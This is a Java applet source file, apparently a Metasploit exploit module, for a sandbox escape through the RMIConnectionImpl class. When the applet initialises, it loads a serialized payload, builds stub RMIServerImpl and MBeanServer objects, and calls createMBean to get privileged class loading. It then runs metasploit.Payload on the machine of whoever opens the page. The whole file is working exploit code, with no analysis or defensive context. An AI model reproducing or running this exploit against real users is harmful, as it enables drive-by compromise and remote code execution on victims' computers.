import java.applet.Applet; import java.io.IOException; import java.io.InputStream; import java.io.ObjectInputStream; import java.rmi.MarshalledObject; import java.rmi.Remote; import java.util.Set; import javax.management.Attribute; import javax.management.AttributeList; import javax.management.AttributeNotFoundException; import javax.management.InstanceAlreadyExistsException; import javax.management.InstanceNotFoundException; import javax.management.IntrospectionException; import javax.management.InvalidAttributeValueException; import javax.management.ListenerNotFoundException; import javax.management.MBeanException; import javax.management.MBeanInfo; import javax.management.MBeanRegistrationException; import javax.management.MBeanServer; import javax.management.NotCompliantMBeanException; import javax.management.NotificationFilter; import javax.management.NotificationListener; import javax.management.ObjectInstance; import javax.management.ObjectName; import javax.management.OperationsException; import javax.management.QueryExp; import javax.management.ReflectionException; import javax.management.loading.ClassLoaderRepository; import javax.management.remote.rmi.RMIConnection; import javax.management.remote.rmi.RMIConnectionImpl; import javax.management.remote.rmi.RMIServerImpl; import javax.security.auth.Subject; import metasploit.Payload; /** * This class exploits the vulnerability in the RMIConnectionImpl class by * loading the serialized PayloadClassloader. * * @author mka * */ public class Exploit extends Applet { private static final long serialVersionUID = 2205862970052148546L; @Override public void init() { try { MarshalledObject params = this.getPayload(); RMIServerImpl impl = getRMIServerImpl(); impl.setMBeanServer(getMbeanServer()); RMIConnectionImpl connectionImpl = new RMIConnectionImpl(impl, "metasploit", null, null, null); connectionImpl.createMBean("PayloadClassLoader", null, null, params, null, null); } catch (Exception e) { try { PayloadClassLoader.instance.loadIt(); Payload.main(null); } catch (Exception e1) { } } } private MBeanServer getMbeanServer() { return new MBeanServer() { @Override public void unregisterMBean(ObjectName name) throws InstanceNotFoundException, MBeanRegistrationException { } @Override public AttributeList setAttributes(ObjectName name, AttributeList attributes) throws InstanceNotFoundException, ReflectionException { return null; } @Override public void setAttribute(ObjectName name, Attribute attribute) throws InstanceNotFoundException, AttributeNotFoundException, InvalidAttributeValueException, MBeanException, ReflectionException { } @Override public void removeNotificationListener(ObjectName name, NotificationListener listener, NotificationFilter filter, Object handback) throws InstanceNotFoundException, ListenerNotFoundException { } @Override public void removeNotificationListener(ObjectName name, ObjectName listener, NotificationFilter filter, Object handback) throws InstanceNotFoundException, ListenerNotFoundException { } @Override public void removeNotificationListener(ObjectName name, NotificationListener listener) throws InstanceNotFoundException, ListenerNotFoundException { } @Override public void removeNotificationListener(ObjectName name, ObjectName listener) throws InstanceNotFoundException, ListenerNotFoundException { } @Override public ObjectInstance registerMBean(Object object, ObjectName name) throws InstanceAlreadyExistsException, MBeanRegistrationException, NotCompliantMBeanException { return null; } @Override public Set queryNames(ObjectName name, QueryExp query) { return null; } @Override public Set queryMBeans(ObjectName name, QueryExp query) { return null; } @Override public boolean isRegistered(ObjectName name) { return false; } @Override public boolean isInstanceOf(ObjectName name, String className) throws InstanceNotFoundException { return false; } @Override public Object invoke(ObjectName name, String operationName, Object[] params, String[] signature) throws InstanceNotFoundException, MBeanException, ReflectionException { return null; } @Override public Object instantiate(String className, ObjectName loaderName, Object[] params, String[] signature) throws ReflectionException, MBeanException, InstanceNotFoundException { return null; } @Override public Object instantiate(String className, Object[] params, String[] signature) throws ReflectionException, MBeanException { return null; } @Override public Object instantiate(String className, ObjectName loaderName) throws ReflectionException, MBeanException, InstanceNotFoundException { return null; } @Override public Object instantiate(String className) throws ReflectionException, MBeanException { return null; } @Override public ObjectInstance getObjectInstance(ObjectName name) throws InstanceNotFoundException { return null; } @Override public MBeanInfo getMBeanInfo(ObjectName name) throws InstanceNotFoundException, IntrospectionException, ReflectionException { return null; } @Override public Integer getMBeanCount() { return null; } @Override public String[] getDomains() { return null; } @Override public String getDefaultDomain() { return null; } @Override public ClassLoaderRepository getClassLoaderRepository() { return new ClassLoaderRepository() { @Override public Class loadClassWithout(ClassLoader exclude, String className) throws ClassNotFoundException { return null; } @Override public Class loadClassBefore(ClassLoader stop, String className) throws ClassNotFoundException { return null; } @Override public Class loadClass(String className) throws ClassNotFoundException { return null; } }; } @Override public ClassLoader getClassLoaderFor(ObjectName mbeanName) throws InstanceNotFoundException { return null; } @Override public ClassLoader getClassLoader(ObjectName loaderName) throws InstanceNotFoundException { return null; } @Override public AttributeList getAttributes(ObjectName name, String[] attributes) throws InstanceNotFoundException, ReflectionException { return null; } @Override public Object getAttribute(ObjectName name, String attribute) throws MBeanException, AttributeNotFoundException, InstanceNotFoundException, ReflectionException { return null; } @Override public ObjectInputStream deserialize(String className, ObjectName loaderName, byte[] data) throws InstanceNotFoundException, OperationsException, ReflectionException { return null; } @Override public ObjectInputStream deserialize(String className, byte[] data) throws OperationsException, ReflectionException { return null; } @Override public ObjectInputStream deserialize(ObjectName name, byte[] data) throws InstanceNotFoundException, OperationsException { return null; } @Override public ObjectInstance createMBean(String className, ObjectName name, ObjectName loaderName, Object[] params, String[] signature) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException, InstanceNotFoundException { return null; } @Override public ObjectInstance createMBean(String className, ObjectName name, Object[] params, String[] signature) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException { return null; } @Override public ObjectInstance createMBean(String className, ObjectName name, ObjectName loaderName) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException, InstanceNotFoundException { return null; } @Override public ObjectInstance createMBean(String className, ObjectName name) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException { return null; } @Override public void addNotificationListener(ObjectName name, ObjectName listener, NotificationFilter filter, Object handback) throws InstanceNotFoundException { } @Override public void addNotificationListener(ObjectName name, NotificationListener listener, NotificationFilter filter, Object handback) throws InstanceNotFoundException { } }; } private RMIServerImpl getRMIServerImpl() { return new RMIServerImpl(null) { @Override public Remote toStub() throws IOException { return null; } @Override protected RMIConnection makeClient(String connectionId, Subject subject) throws IOException { return null; } @Override protected String getProtocol() { return null; } @Override protected void export() throws IOException { } @Override protected void closeServer() throws IOException { } @Override protected void closeClient(RMIConnection client) throws IOException { } }; } public MarshalledObject getPayload() throws IOException, ClassNotFoundException { InputStream f = super.getClass().getResourceAsStream("payload.ser"); ObjectInputStream stream = new ObjectInputStream(f); MarshalledObject object = (MarshalledObject) stream.readObject(); stream.close(); return object; } }